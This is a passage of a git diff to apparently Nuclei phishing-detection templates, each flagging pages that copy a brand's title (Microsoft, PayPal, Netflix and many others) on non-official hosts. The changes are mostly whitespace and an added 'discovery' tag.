+ - 200 + + - type: dsl + dsl: - '!contains(host,"messenger.com")' # digest: 4a0a00473045022100ae775103b3a2aa574dbd95a70debcaf7efe70d641e9daf679c470aca7c18aa9902206df01559edd17c450ce105e4b2d363874577935ae0f091b44a59def677f154e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/microcenter-phish.yaml b/http/osint/phishing/microcenter-phish.yaml index 375abdb554c..7bd6f160ff1 100644 --- a/http/osint/phishing/microcenter-phish.yaml +++ b/http/osint/phishing/microcenter-phish.yaml @@ -1,5 +1,5 @@ -id: microcenter-phish - +id: microcenter-phish + info: name: microcenter phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://microcenter.com metadata: max-request: 1 - tags: phishing,microcenter,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Micro Center - Computer & Electronics Retailer - Shop Now' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,microcenter,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Micro Center - Computer & Electronics Retailer - Shop Now' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"microcenter.com")' # digest: 490a0046304402204b4ef986c9252f99d9a13ad4d649652485cdbe1c80671972e68ddc2ad6658d6602205e728c8650e3dd878133c41416a278214f6970f0266f3cfc484ff978bda5509e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/microsoft-phish.yaml b/http/osint/phishing/microsoft-phish.yaml index 0a1d23e20fc..1736ddad921 100644 --- a/http/osint/phishing/microsoft-phish.yaml +++ b/http/osint/phishing/microsoft-phish.yaml @@ -1,5 +1,5 @@ -id: microsoft-phish - +id: microsoft-phish + info: name: Microsoft phishing Detection author: rxerium @@ -11,27 +11,27 @@ info: - https://microsoft.com metadata: max-request: 1 - tags: phishing,microsoft,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Login | Microsoft 365' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"office.com")' + tags: phishing,microsoft,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Login | Microsoft 365' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"office.com")' - '!contains(host,"microsoft.com")' # digest: 4a0a00473045022031d80be6babebb80ced6da05768733dfb37045ddf48a2e269f162c36e8262988022100d118cd2312ad9ebd9ac5bf59983f295d338368ace6283b9ca8f7ca896b7d781e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/microsoft-teams-phish.yaml b/http/osint/phishing/microsoft-teams-phish.yaml index 7ddc9225276..2d639c42940 100644 --- a/http/osint/phishing/microsoft-teams-phish.yaml +++ b/http/osint/phishing/microsoft-teams-phish.yaml @@ -1,5 +1,5 @@ -id: microsoft-teams-phish - +id: microsoft-teams-phish + info: name: microsoft teams phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://www.microsoft.com/en-gb/microsoft-teams/download-app metadata: max-request: 1 - tags: phishing,microsoft-teams,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Download Microsoft Teams Desktop and Mobile Apps | Microsoft Teams' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,microsoft-teams,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Download Microsoft Teams Desktop and Mobile Apps | Microsoft Teams' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"microsoft.com")' # digest: 4b0a004830460221009635ba12b9fdc2bf237afc1c6ce86dfeefad0c9c5feccaa072e61a4945a237b4022100ec6a9bb235ed401c0f4b1e4b0b389727eb28ca9bd5cfe1b1580a9ec1e4dd0049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/naver-login-phish.yaml b/http/osint/phishing/naver-login-phish.yaml index 1e557e9acbd..1aad472a90e 100644 --- a/http/osint/phishing/naver-login-phish.yaml +++ b/http/osint/phishing/naver-login-phish.yaml @@ -1,5 +1,5 @@ -id: naver-login-phish - +id: naver-login-phish + info: name: naver login phishing Detection author: hahwul @@ -11,27 +11,27 @@ info: - https://www.navercorp.com metadata: max-request: 1 - tags: phishing,naver,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - '네이버 : 로그인' + tags: phishing,naver,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - '네이버 : 로그인' - '로그인' - - - type: status - status: - - 200 - - - type: dsl - dsl: + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"nid.naver.com")' # digest: 4b0a00483046022100bb1f0819d7da6f651793e632e43a600a6c1c3dbc5126bafadfba3a4807411224022100ac551f42db8b6171abcddb8dd734209ecebfad9652cda6aab6cd226f36958360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/netflix-phish.yaml b/http/osint/phishing/netflix-phish.yaml index bedf9b67cc5..4ccfa678e54 100644 --- a/http/osint/phishing/netflix-phish.yaml +++ b/http/osint/phishing/netflix-phish.yaml @@ -1,5 +1,5 @@ -id: netflix-phish - +id: netflix-phish + info: name: netflix phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://netflix.com metadata: max-request: 1 - tags: phishing,netflix,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Watch Netflix films & TV programmes online or stream right to your smart TV, game console, PC, Mac, mobile, tablet and more.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,netflix,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Watch Netflix films & TV programmes online or stream right to your smart TV, game console, PC, Mac, mobile, tablet and more.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"netflix.com")' # digest: 4a0a004730450221009b418650ea8a5d5a5c9658e7fde64b46602c0c28952c2c99130a600abe51bcfb022060f5c78f69f35a23117057c5555b47d5c15b8de9e1843ee64b0b4b9a5e7fba52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/nordpass-phish.yaml b/http/osint/phishing/nordpass-phish.yaml index 34fc12f7d75..c2bbf32a049 100644 --- a/http/osint/phishing/nordpass-phish.yaml +++ b/http/osint/phishing/nordpass-phish.yaml @@ -1,5 +1,5 @@ -id: nordpass-phish - +id: nordpass-phish + info: name: nordpass phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://nordpass.com metadata: max-request: 1 - tags: phishing,nordpass,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Securely Store, Manage & Autofill Passwords | NordPass' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,nordpass,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Securely Store, Manage & Autofill Passwords | NordPass' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"nordpass.com")' # digest: 490a0046304402204a80245ae784db99a4258981b3adad53113727de76c0706f4d3ebe719e456aa0022048384d5b2a6903c1608b9589ff29794135ed0c9d93fb6850f8c728e3227e193f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/norton-phish.yaml b/http/osint/phishing/norton-phish.yaml index 10b94ce832c..fb936052bbe 100644 --- a/http/osint/phishing/norton-phish.yaml +++ b/http/osint/phishing/norton-phish.yaml @@ -1,5 +1,5 @@ -id: norton-phish - +id: norton-phish + info: name: norton phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://norton.com metadata: max-request: 1 - tags: phishing,norton,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Official Site | Norton™ - Antivirus & Anti-Malware Software' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,norton,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Official Site | Norton™ - Antivirus & Anti-Malware Software' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"norton.com")' # digest: 490a0046304402202f5abb291cff4bfff6b067a5eb5d1620c8136143b544fdb3c43911617f145cec02201dfbed8efc65e95ca6a809ada0dc03cae40bff62c717635af5cf90d747b02562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/notion-phish.yaml b/http/osint/phishing/notion-phish.yaml index d28cbbba152..929f3550aa9 100644 --- a/http/osint/phishing/notion-phish.yaml +++ b/http/osint/phishing/notion-phish.yaml @@ -1,5 +1,5 @@ -id: notion-phish - +id: notion-phish + info: name: notion phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://notion.so metadata: max-request: 1 - tags: phishing,notion,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Your connected workspace for wiki, docs & projects | Notion' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,notion,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Your connected workspace for wiki, docs & projects | Notion' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"notion.so")' # digest: 490a0046304402204df15823c2ea2e44e1afdbca77b386b7e20c621521788bb18d5db8ea324e343202201e86ae3d093fa52d71da371dab08a1e27c22ecd0af4467c24a5ae8b4e3a267da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/o2-mobile-phish.yaml b/http/osint/phishing/o2-mobile-phish.yaml index 95eee61b7cd..b3b217794a3 100644 --- a/http/osint/phishing/o2-mobile-phish.yaml +++ b/http/osint/phishing/o2-mobile-phish.yaml @@ -1,5 +1,5 @@ -id: o2-mobile-phish - +id: o2-mobile-phish + info: name: o2 phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://o2.co.uk metadata: max-request: 1 - tags: phishing,o2,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'O2 | Phone, SIM & Tech Deals - See What You Can Do' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,o2,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'O2 | Phone, SIM & Tech Deals - See What You Can Do' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"o2.co.uk")' # digest: 490a004630440220479c577e0d3471c2d31235e7d45636d258c4e90a83381e1f476149b73b2b1d9f022044dd1ce25e63974e998f9e0406203b6036df415d2bac155d4a93f5d770853d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/openai-phish.yaml b/http/osint/phishing/openai-phish.yaml index 6a8cc20d0b9..7e31429665b 100644 --- a/http/osint/phishing/openai-phish.yaml +++ b/http/osint/phishing/openai-phish.yaml @@ -1,5 +1,5 @@ -id: openai-phish - +id: openai-phish + info: name: openai phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://openai.com metadata: max-request: 1 - tags: phishing,openai,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Log in to OpenAI to continue to OpenAI Platform.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,openai,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Log in to OpenAI to continue to OpenAI Platform.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"openai.com")' # digest: 4a0a0047304502210091ceff9be6f6d915ed144aa245a1900ca8bca06e9e010ba331cb3e792a72a80302201c8622c3bc263c487f6bc61355f6615b271f389e4da925479fec2f1714378d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/opera-phish.yaml b/http/osint/phishing/opera-phish.yaml index 44fdb19c4b0..538e7d12eed 100644 --- a/http/osint/phishing/opera-phish.yaml +++ b/http/osint/phishing/opera-phish.yaml @@ -1,5 +1,5 @@ -id: opera-phish - +id: opera-phish + info: name: opera phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://opera.com metadata: max-request: 1 - tags: phishing,opera,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Opera Web Browser | Faster, Safer, Smarter | Oper' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,opera,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Opera Web Browser | Faster, Safer, Smarter | Oper' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"opera.com")' # digest: 4b0a00483046022100dcb3c553df377d78ebd425f373e03eaa9df88f1192825a61e5428aa768ccb41f0221009f42d4967a47f64922da99998f47a3a8991fee99edf10a05406ff0433d18eace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/paramountplus-phish.yaml b/http/osint/phishing/paramountplus-phish.yaml index 93785d18104..59cfbe93518 100644 --- a/http/osint/phishing/paramountplus-phish.yaml +++ b/http/osint/phishing/paramountplus-phish.yaml @@ -1,5 +1,5 @@ -id: paramountplus-phish - +id: paramountplus-phish + info: name: paramountplus phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://paramountplus.com metadata: max-request: 1 - tags: phishing,paramountplus,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Paramount+ United Kingdom - Stream Blockbusters, New Originals and Hit Shows' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,paramountplus,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Paramount+ United Kingdom - Stream Blockbusters, New Originals and Hit Shows' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"paramountplus.com")' # digest: 490a004630440220229cce9d31fd292f6f729ecb4f3d67d5334f401dd7063ef8ebd13928ed5e07fc02203448f714a9734b3f73cf10e475fcf54d286dbef014dd98c2bf3396c5a2aca2e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/paypal-phish.yaml b/http/osint/phishing/paypal-phish.yaml index 3dae21aecda..8933d1a78f5 100644 --- a/http/osint/phishing/paypal-phish.yaml +++ b/http/osint/phishing/paypal-phish.yaml @@ -1,5 +1,5 @@ -id: Paypal-phish - +id: Paypal-phish + info: name: Paypal phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://paypal.com metadata: max-request: 1 - tags: phishing,paypal,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - "Log in to PayPal automatically for faster checkout without entering your password wherever you're logged in with your Google account." - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,paypal,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - "Log in to PayPal automatically for faster checkout without entering your password wherever you're logged in with your Google account." + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"paypal.com")' # digest: 4a0a00473045022100f7971f7f4044bc6649f4ae46a31d5448030adedc03b20ad55ebd7e4675244aa5022017c487ba952938049b1a80263c2e3439e39beb4b8f8dafc14b29990c56fe2c2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/pcloud-phish.yaml b/http/osint/phishing/pcloud-phish.yaml index 8e8e817da87..0325a9e151f 100644 --- a/http/osint/phishing/pcloud-phish.yaml +++ b/http/osint/phishing/pcloud-phish.yaml @@ -1,5 +1,5 @@ -id: pcloud-phish - +id: pcloud-phish + info: name: pcloud phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://pcloud.com metadata: max-request: 1 - tags: phishing,pcloud,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - "pCloud - Europe's Most Secure Cloud Storage" - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,pcloud,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - "pCloud - Europe's Most Secure Cloud Storage" + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"pcloud.com")' # digest: 490a0046304402202d667dbb6f292f5ebbe096bcaef675038aea4f54ec05eb147af7e293c214d32102202d36e1aa369d8b0a325e66a4a91f78319d4ec73951e02a05d0eba37178fac2a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/pintrest-phish.yaml b/http/osint/phishing/pintrest-phish.yaml index 8bd0b81eda1..b5d273d0531 100644 --- a/http/osint/phishing/pintrest-phish.yaml +++ b/http/osint/phishing/pintrest-phish.yaml @@ -1,5 +1,5 @@ -id: pinterest-phish - +id: pinterest-phish + info: name: pinterest phishing Detection author: rxerium @@ -10,30 +10,30 @@ info: - https://pinterest.com metadata: max-request: 1 - tags: phishing,pinterest,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Discover recipes, home ideas, style inspiration and other ideas to try' - - - type: word - words: - - 'Pinterest' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,pinterest,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Discover recipes, home ideas, style inspiration and other ideas to try' + + - type: word + words: + - 'Pinterest' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"pinterest.com")' # digest: 490a004630440220756ec25ab6bdfdee2c1ceee6ed5abc20e9f6e3b54880c4551dd3d6d7c585812a02207811852da3d5bbaec989b08fc9292503f2b8e99375162e728e84dd2ca9e27f6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/plusnet-phish.yaml b/http/osint/phishing/plusnet-phish.yaml index 2e5f2b012f4..b68e17fa1d8 100644 --- a/http/osint/phishing/plusnet-phish.yaml +++ b/http/osint/phishing/plusnet-phish.yaml @@ -1,5 +1,5 @@ -id: plusnet-phish - +id: plusnet-phish + info: name: plusnet phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://plus.net metadata: max-request: 1 - tags: phishing,plusnet,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Multi-Award Winner with Even Faster UK Broadband | Plusnet' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,plusnet,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Multi-Award Winner with Even Faster UK Broadband | Plusnet' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"plus.net")' # digest: 4a0a00473045022045d2fc5df8420ea733cd92b11e13c711fbe04ea548078501a652c557847de938022100b305a54479e76ce536889927f5e828a546ad3ec6407661745e65c44a18ed1ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/proton-phish.yaml b/http/osint/phishing/proton-phish.yaml index 71d9638f869..7e249bd51e6 100644 --- a/http/osint/phishing/proton-phish.yaml +++ b/http/osint/phishing/proton-phish.yaml @@ -1,5 +1,5 @@ -id: proton-phish - +id: proton-phish + info: name: proton phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://proton.me metadata: max-request: 1 - tags: phishing,proton,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Proton Account: Sign-in' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,proton,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Proton Account: Sign-in' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"proton.me")' # digest: 490a004630440220567d96cdb0fcf032a189f1ad77bb923c328190f248c72e51eed1d65d845636ab02203d4992ff468891c757277632cc390bb967f40da67cc20f5d8e9210880b5fbd46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/putty-phish.yaml b/http/osint/phishing/putty-phish.yaml index 93692bc0e29..e0d3c2da012 100644 --- a/http/osint/phishing/putty-phish.yaml +++ b/http/osint/phishing/putty-phish.yaml @@ -1,5 +1,5 @@ -id: putty-phish - +id: putty-phish + info: name: putty phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://putty.org metadata: max-request: 1 - tags: phishing,putty,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Download PuTTY - a free SSH and telnet client for Windows' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,putty,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Download PuTTY - a free SSH and telnet client for Windows' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"putty.org")' # digest: 490a004630440220093d5d3a453ca0743e91edaa0ba3af8d55bc32a64e1de4ea91a9d87a6983a7d00220282d712f160125374b2ccdad707df6d45393ca3913fc0914e549c54abf0b0a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/python-phish.yaml b/http/osint/phishing/python-phish.yaml index b5954ff896f..694e637df04 100644 --- a/http/osint/phishing/python-phish.yaml +++ b/http/osint/phishing/python-phish.yaml @@ -1,5 +1,5 @@ -id: python-phish - +id: python-phish + info: name: python phishing Detection author: rxerium @@ -10,29 +10,29 @@ info: - https://python.org metadata: max-request: 1 - tags: phishing,python,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Welcome to Python.org' - - 'The official home of the Python Programming Language' - condition: and - - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,python,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to Python.org' + - 'The official home of the Python Programming Language' + condition: and + + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"python.org")' # digest: 4a0a00473045022100a3380ff3db26c8c4944e2d129f0dc3ccce8ca9f2285667227c12233ad4a9d9f3022065b3477ef1920c35a7aa195eb921e1e392e5daad807e9691906980c3df3834fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/quora-phish.yaml b/http/osint/phishing/quora-phish.yaml index 18e6a720de9..ac6511d9c18 100644 --- a/http/osint/phishing/quora-phish.yaml +++ b/http/osint/phishing/quora-phish.yaml @@ -1,5 +1,5 @@ -id: quora-phish - +id: quora-phish + info: name: quora phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://quora.com metadata: max-request: 1 - tags: phishing,quora,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Quora - A place to share knowledge and better understand the world' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,quora,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Quora - A place to share knowledge and better understand the world' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"quora.com")' # digest: 4a0a0047304502200870906a989971676d58a310a58625244cf04c928c525bb984e577c7ab0f4d5002210092899a8c94969077ad1a7b92375bc269c5bb9927a1cacc72c60c3870bd44dc8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/reddit-phish.yaml b/http/osint/phishing/reddit-phish.yaml index 6268f2c1481..332535e62d8 100644 --- a/http/osint/phishing/reddit-phish.yaml +++ b/http/osint/phishing/reddit-phish.yaml @@ -1,5 +1,5 @@ -id: reddit-phish - +id: reddit-phish + info: name: reddit phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://reddit.com metadata: max-request: 1 - tags: phishing,reddit,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Reddit - Dive into anything' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,reddit,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Reddit - Dive into anything' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"reddit.com")' # digest: 4a0a00473045022100f06940660a9072e9d7687b28ff5341e3e7ccbcfc9f4c723848bf8f858bd94716022012bc3fae07fd49eccf0d3f8980308a501d99ec66bf348c173ac24304ee4bd303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/roblox-phish.yaml b/http/osint/phishing/roblox-phish.yaml index ce899ab3a7b..2b27b87a3be 100644 --- a/http/osint/phishing/roblox-phish.yaml +++ b/http/osint/phishing/roblox-phish.yaml @@ -1,5 +1,5 @@ -id: roblox-phish - +id: roblox-phish + info: name: roblox phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://roblox.com metadata: max-request: 1 - tags: phishing,roblox,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Roblox is ushering in the next generation of entertainment. Imagine, create, and play together with millions of people across an infinite variety of immersive, user-generated 3D worlds.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,roblox,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Roblox is ushering in the next generation of entertainment. Imagine, create, and play together with millions of people across an infinite variety of immersive, user-generated 3D worlds.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"roblox.com")' # digest: 4a0a00473045022044ffdae7452627597349728fa2b3e3c1d7998fb5460d77feeacfda3c5beb1d5402210081c44859640f2640a599cff55d22c314e5cb1bae2dd3886d41953d4a9edadce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/roboform-phish.yaml b/http/osint/phishing/roboform-phish.yaml index 4ce28ad0a25..b1e19e4c379 100644 --- a/http/osint/phishing/roboform-phish.yaml +++ b/http/osint/phishing/roboform-phish.yaml @@ -1,5 +1,5 @@ -id: roboform-phish - +id: roboform-phish + info: name: roboform phishing Detection author: rxerium @@ -10,29 +10,29 @@ info: - https://roboform.com metadata: max-request: 1 - tags: phishing,roboform,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Best Password Manager: No more writing down passwords' - - 'Multi-platform secure solution to simplify your online experience. One click login on Chrome, Firefox, Safari, IE, Opera, Edge, Windows, Mac, iOS, Android.' - - 'roboform' - condition: and - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,roboform,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Best Password Manager: No more writing down passwords' + - 'Multi-platform secure solution to simplify your online experience. One click login on Chrome, Firefox, Safari, IE, Opera, Edge, Windows, Mac, iOS, Android.' + - 'roboform' + condition: and + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"roboform.com")' # digest: 4a0a00473045022100fc7d5149f36c4f0f20d97ee00a4f5184db6d6420503de974a9301ad6af71335902207587a8cae81cf17e09a4ea29b6e86209a3a88b201d496180ca2b258c56417ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/royal-mail-phish.yaml b/http/osint/phishing/royal-mail-phish.yaml index 649d3e06929..93154dd51a5 100644 --- 